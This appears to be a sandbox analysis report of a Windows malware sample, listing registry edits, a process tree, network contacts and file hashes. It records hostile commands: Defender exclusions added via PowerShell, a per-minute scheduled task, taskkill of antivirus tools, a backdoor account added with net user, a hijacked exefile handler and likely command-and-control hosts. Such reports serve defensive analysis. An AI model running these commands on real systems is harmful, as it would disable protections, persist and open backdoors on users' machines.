| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-384068567-2943195810-3631207890-1000\{0BD19191-5D7F-4C59-BCEB-85BBF7CF1334} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\uzdixv.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file3.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fzvbsa.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CurrentVersion | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CurrentVersion\Explorern | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CurrentVersion\Explorern\NoControlPanel = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explîrer | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explîrer\StartmenuLogoff = "1" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Test.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\vydcyu.exe
"C:\Users\Admin\AppData\Local\Temp\vydcyu.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\file2.exe"
C:\Users\Admin\AppData\Local\Temp\file2.exe
C:\Users\Admin\AppData\Local\Temp\file2.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\file3.exe"
C:\Users\Admin\AppData\Local\Temp\file3.exe
C:\Users\Admin\AppData\Local\Temp\file3.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp\file2.exe" +s +h
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /k attrib C:\Users\Admin\AppData\Local\Temp\file2.exe +s +h
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp" +s +h
C:\Windows\SysWOW64\notepad.exe
notepad
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /k attrib C:\Users\Admin\AppData\Local\Temp +s +h
C:\Windows\SysWOW64\attrib.exe
attrib C:\Users\Admin\AppData\Local\Temp\file2.exe +s +h
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\attrib.exe
attrib C:\Users\Admin\AppData\Local\Temp +s +h
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE"
C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE
C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE
C:\Windows\SysWOW64\notepad.exe
notepad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://prison-fakes.ru/s/3.php?t=
C:\Windows\SysWOW64\rundll32.exe
rundll32 user32, SwapMouseButton
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument http://prison-fakes.ru/s/3.php?t=
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument http://prison-fakes.ru/s/3.php?t=
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x418
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Name.vbs"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spidernt.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im avz.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im drweb32w.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im filemon.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regmon.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im avp.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im avp32.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im bidef.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im frv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ndd32.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im minilog.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im zonealarm.exe
C:\Windows\SysWOW64\net.exe
net user Безопасная зона 1234 /add
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe" >> NUL
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe >> NUL
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Безопасная зона 1234 /add
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\uzdixv.exe"
C:\Users\Admin\AppData\Local\Temp\uzdixv.exe
C:\Users\Admin\AppData\Local\Temp\uzdixv.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Service.exe"
C:\Users\Admin\AppData\Local\Temp\Service.exe
C:\Users\Admin\AppData\Local\Temp\Service.exe
C:\Windows\SysWOW64\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\xyz.vbs"
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\OST-Silent-Hill-Zvuk-sireny(muzofon.com).mp3"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\zxeafc.EXE"
C:\Users\Admin\AppData\Local\Temp\zxeafc.EXE
C:\Users\Admin\AppData\Local\Temp\zxeafc.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\usrpyw.EXE"
C:\Users\Admin\AppData\Local\Temp\usrpyw.EXE
C:\Users\Admin\AppData\Local\Temp\usrpyw.EXE
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\fzvbsa.exe"
C:\Users\Admin\AppData\Local\Temp\fzvbsa.exe
C:\Users\Admin\AppData\Local\Temp\fzvbsa.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ahevhj.exe"
C:\Users\Admin\AppData\Local\Temp\ahevhj.exe
C:\Users\Admin\AppData\Local\Temp\ahevhj.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ugbxwz.EXE"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\SYSTEM32\CMD.EXE
"CMD.EXE"
C:\Windows\system32\msg.exe
msg
C:\Windows\system32\msg.exe
msg * hacked
C:\Windows\system32\msg.exe
msg * ?? ?????
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qp1s5xt5\qp1s5xt5.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES891E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc927B9FEB7DC54E5FBC8440C18A1DCD7.TMP"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\explorer.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\05b1294391bb46059d72d21b3f3b4045 /t 4988 /p 2116
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\dca72dcaecf0483e91257b99088add55 /t 2112 /p 2252
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edition-ages.gl.at.ply.gg | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 21.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
Files
| SHA256 | da333c92fdfd2e8092f5b56686b94f713f8fa27ef8f333e7222259ad1eb08f5d |
| SHA512 | b2f3398e486cde482cb6bea18f4e5312fa2db7382ca25cea17bcba5ab1ff0e891d59328bc567641a9da05caca4d7c61dc102289d46e7135f947ce6155e295711 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE
| MD5 | 5c78384d8eb1f6cb8cb23d515cfe7c98 |
| SHA1 | b732ab6c3fbf2ded8a4d6c8962554d119f59082e |
| SHA256 | 9abd7f0aa942ee6b263cdc4b32a4110ddb95e43ad411190f0ea48c0064884564 |
| SHA512 | 99324af5f8fb70a9d01f97d845a4c6999053d6567ba5b80830a843a1634b02eaf3c0c04ced924cf1b1be9b4d1dbbcb95538385f7f85ad84d3eaaa6dcdebcc8a6 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE
| MD5 | a5d9eaa7d52bffc494a5f58203c6c1b5 |
| SHA1 | 97928ba7b61b46a1a77a38445679d040ffca7cc8 |
| SHA256 | 34b8662d38e7d3d6394fa6c965d943d2c82ea06ba9d7a0af4f8e0571fb5a9c48 |
| SHA512 | b6fdc8389bb4d736d608600469be6a4b0452aa3ea082f9a0791022a14c02b8fb7dcd62df133b0518e91283094eaba2be9318316f72d2c4aae6286d3e8686e787 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe
| MD5 | 5119e350591269f44f732b470024bb7c |
| SHA1 | 4ccd48e4c6ba6e162d1520760ee3063e93e2c014 |
| SHA256 | 2b3aa9642b291932ba7f9f3d85221402a9d27078f56ef0e9c6bca633616e3873 |
| SHA512 | 599b4ec673169d42a348d1117737b4ad4d7539574153df5a5c7689130c9ac5ff5cd00f3c8ec39adf32ff2b56be074081efcabb6456272c649703c3ea6cdaded4 |
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE
| MD5 | 27543bab17420af611ccc3029db9465a |
| SHA1 | f0f96fd53f9695737a3fa6145bc5a6ce58227966 |
| SHA256 | 75530dc732f35cc796d19edd11ae6d6f6ef6499ddcf2e57307582b1c5299554c |
| SHA512 | a62c2dd60e1df309ec1bb48ea85184914962ba83766f29d878569549ca20fca68f304f4494702d9e5f09adedc2166e48ee0bc1f4a5d9e245c5490daf15036bea |
C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE
| MD5 | d9a290f7aec8aff3591c189b3cf8610a |
| SHA1 | 7558d29fb32018897c25e0ac1c86084116f1956c |
| SHA256 | 41bed95cb1101181a97460e2395efebb0594849e6f48b80a2b7c376ddf5ce0ea |
| SHA512 | b55ab687a75c11ba99c64be42ad8471576aa2df10ce1bb61e902e98827e3a38cd922e365751bd485cac089c2bd8bccf939a578da7238506b77fe02a3eb7994c6 |
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE
| MD5 | d9186b6dd347f1cf59349b6fc87f0a98 |
| SHA1 | 6700d12be4bd504c4c2a67e17eea8568416edf93 |
| SHA256 | a892284c97c8888a589ea84f88852238b8cd97cc1f4af85b93b5c5264f5c40d4 |
| SHA512 | a29cc26028a68b0145cb20ec353a4406ec86962ff8c3630c96e0627639cf76e0ea1723b7b44592ea4f126c4a48d85d92f930294ae97f72ecc95e3a752a475087 |
C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE
| MD5 | 87bb2253f977fc3576a01e5cbb61f423 |
| SHA1 | 5129844b3d8af03e8570a3afcdc5816964ed8ba4 |
| SHA256 | 3fc32edf3f9ab889c2cdf225a446da1e12a7168a7a56165efe5e9744d172d604 |
| SHA512 | 7cfd38ceb52b986054a68a781e01c3f99e92227f884a4401eb9fbc72f4c140fd32a552b4a102bedf9576e6a0da216bc10ce29241f1418acb39aeb2503cb8d703 |
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE
| MD5 | 674eddc440664b8b854bc397e67ee338 |
